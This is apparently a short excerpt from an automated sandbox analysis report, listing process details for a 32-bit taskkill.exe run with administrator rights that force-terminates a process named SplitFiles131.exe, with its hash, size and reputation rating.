                Path: C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit): true
                Commandline: taskkill /im "SplitFiles131.exe" /f
                Imagebase: 0x1f0000
                File size: 74752 bytes
                MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                No disassembly